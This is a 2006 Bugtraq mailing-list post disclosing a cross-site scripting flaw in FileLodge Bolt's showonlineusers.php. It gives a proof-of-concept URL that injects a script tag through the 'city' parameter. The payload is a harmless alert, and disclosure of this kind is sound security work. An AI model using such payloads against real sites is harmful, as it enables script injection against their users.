FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility
From: n0m3rcy@xxxxxxxxxxx
Date: 23 Apr 2006 12:24:41 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@xxxxxxxxxxx>
# Exploit:

http://site.com/showonlineusers.php?city=%3Cscript%3Ealert(1);%3C/script%3E

# Shoutz:
nukedx , cijfer , Devil-00 , str0ke

# Have phun!

Prev by Date: [eVuln] RateIt SQL Injection Vulnerability
Next by Date: XSS Bug in OpenGear Server Website
Previous by thread: [eVuln] RateIt SQL Injection Vulnerability
Next by thread: XSS Bug in OpenGear Server Website
Index(es):
- Date
- Thread